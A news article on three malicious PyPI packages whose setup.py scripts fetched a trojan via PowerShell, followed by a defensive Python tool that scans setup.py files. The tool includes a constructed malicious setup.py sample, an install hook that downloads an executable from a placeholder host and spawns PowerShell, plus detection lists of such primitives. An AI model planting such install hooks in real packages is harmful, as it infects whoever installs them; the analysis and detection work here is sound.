
Researchers have discovered another supply chain attack targeting open source code repositories.
This time the repository was PyPI (short for Python Package Index), the official software repository for the Python programming language. Earlier this month, a contributor with the username Lolip0p uploaded three packages titled colorslib, httpslib, and libhttps to PyPI. The contributor took care to disguise all three as legitimate packages, in this case libraries for creating terminal user interfaces and thread-safe connection pooling. All three packages were advertised as offering full-featured ease of use.

Researchers at security firm Fortinet say all three packages are malicious and have identical setup.py scripts. When a package was installed, the setup.py script opened a PowerShell window and downloaded a malicious file called Oxzy.exe. At the time of discovery, this file was detected by only 3 antimalware engines.
Oxzy.exe then downloaded a second malicious file named Update.exe. This file was only detected by 7 antimalware engines.

The last file dropped was named SearchProtocolHost.exe and was detected by 9 engines.

One of those engines was Microsoft’s Defender, which classified the file as Wacatac.b!ml, a piece of malware that Microsoft said “allows malicious hackers to perform many actions of their choosing on your PC.” According to Trend Micro’s analysis, the Trojan has been around since at least 2019, spreading via pirated software available online.
Open source repositories such as PyPI and NPM are increasingly used as vectors for installing malware through supply chain attacks, which plant malicious software at the source, where legitimate projects are distributed. According to security firm ReversingLabs, from 2018 to 2021, this type of attack increased nearly fourfold on NPM and nearly fivefold on PyPI. Between January and October last year, 1,493 malicious packages were uploaded to PyPI and 6,977 malicious packages were uploaded to NPM.
Last September, PyPI supply chain attacks escalated. Attackers launched credential phishing attacks against PyPI contributors and, when successful, used the compromised accounts to publish malware masquerading as the latest releases of the legitimate projects associated with those accounts. The legitimate projects included Exotel and Spam. In contrast to malicious packages that use names similar to well-known projects, these attacks were able to pollute the official sources of long-running projects. The attackers behind them have been active since at least 2021.
“Python end users should always exercise extreme caution before downloading and running packages, especially packages from new authors,” ReversingLabs researchers wrote in a post documenting the latest attack. “As you can see, publishing multiple packages in a short period of time does not indicate that the author is trustworthy.”
The same advice should apply to NPM, RubyGems, and virtually any other open source repository.
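As an added example (not code from the article, nor from Fortinet or ReversingLabs), the script below turns the researchers' due-diligence advice into a concrete pre-install check aimed at the mechanism described above: it parses a package's setup.py and flags the install-time primitives the malicious packages relied on, namely a custom setuptools install command, process spawning, network downloads, and string literals naming PowerShell or executables. The two sample setup.py texts are constructed for the example, and the URL in the malicious one is a placeholder rather than a real indicator.

```python
"""Static triage of a package's setup.py for install-time code execution.

Added example, not the article's or the researchers' code. The malicious
packages described above ran code from setup.py that opened PowerShell and
downloaded executables; this tool walks the setup.py AST and flags the
building blocks that behaviour needs. It is a review aid to run on an sdist
before `pip install`, not a replacement for an antimalware engine.
"""
import ast
from dataclasses import dataclass

# Callables that spawn processes or execute dynamically built code.
SPAWN_CALLS = {
    "os.system", "os.popen", "os.startfile",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output", "subprocess.check_call",
    "exec", "eval",
}
# Callables that fetch remote content at install time.
FETCH_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post",
}
# Substrings that have no business in a package's build script.
SUSPICIOUS_STRINGS = ("powershell", "pwsh", "-encodedcommand", ".exe", "http://", "https://")
# setuptools command classes that attackers subclass to hook `pip install`.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info"}


@dataclass
class Finding:
    line: int
    reason: str


def _dotted_name(node: ast.AST) -> str:
    """Render `a.b.c` from a Name/Attribute chain; '' if it is not a plain chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage_setup_py(source: str) -> list[Finding]:
    """Return findings for install-time execution/download primitives in setup.py."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SPAWN_CALLS:
                findings.append(Finding(node.lineno, f"process/code execution via {name}()"))
            elif name in FETCH_CALLS:
                findings.append(Finding(node.lineno, f"network download via {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hits = [s for s in SUSPICIOUS_STRINGS if s in node.value.lower()]
            if hits:
                findings.append(Finding(node.lineno, f"suspicious string literal {hits}"))
        elif isinstance(node, ast.ClassDef):
            # Subclassing install/develop/egg_info is the usual way to run
            # attacker code during `pip install` of an sdist.
            bases = {_dotted_name(b).rsplit(".", 1)[-1] for b in node.bases}
            if bases & INSTALL_HOOK_BASES:
                findings.append(Finding(node.lineno, f"custom install command class {node.name}"))
    return sorted(findings, key=lambda f: f.line)


# Constructed sample modelled on the behaviour described in the article.
# The URL is a placeholder; only the dropped file name comes from the report.
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        url = "https://example.invalid/Oxzy.exe"  # placeholder, not a real indicator
        urllib.request.urlretrieve(url, "Oxzy.exe")
        subprocess.Popen(["powershell", "-Command", "<launch placeholder>"])

setup(name="constructed_pkg", version="1.0", cmdclass={"install": PostInstall})
'''

# Constructed benign sample: a plain declarative setup.py.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="constructed_pkg", version="0.1", packages=find_packages())
'''


def report(source: str) -> str:
    """Human-readable triage summary for one setup.py text."""
    findings = triage_setup_py(source)
    if not findings:
        return "no install-time execution or download primitives found"
    return "\n".join(f"line {f.line}: {f.reason}" for f in findings)


if __name__ == "__main__":
    print("--- constructed malicious setup.py ---")
    print(report(MALICIOUS_SETUP))
    print("--- constructed benign setup.py ---")
    print(report(BENIGN_SETUP))
```

To use this on a real package, fetch the source distribution without installing it (`pip download --no-deps --no-binary :all: <package>`), unpack it, and run `triage_setup_py` on its setup.py. Two caveats follow from how pip works: a wheel does not execute setup.py at all, so a clean setup.py says nothing about the module code a wheel installs, and a payload hidden behind base64 or string assembly will surface only as an `exec()`/`eval()` hit rather than as a readable URL or PowerShell string, which is exactly why those two calls are on the list.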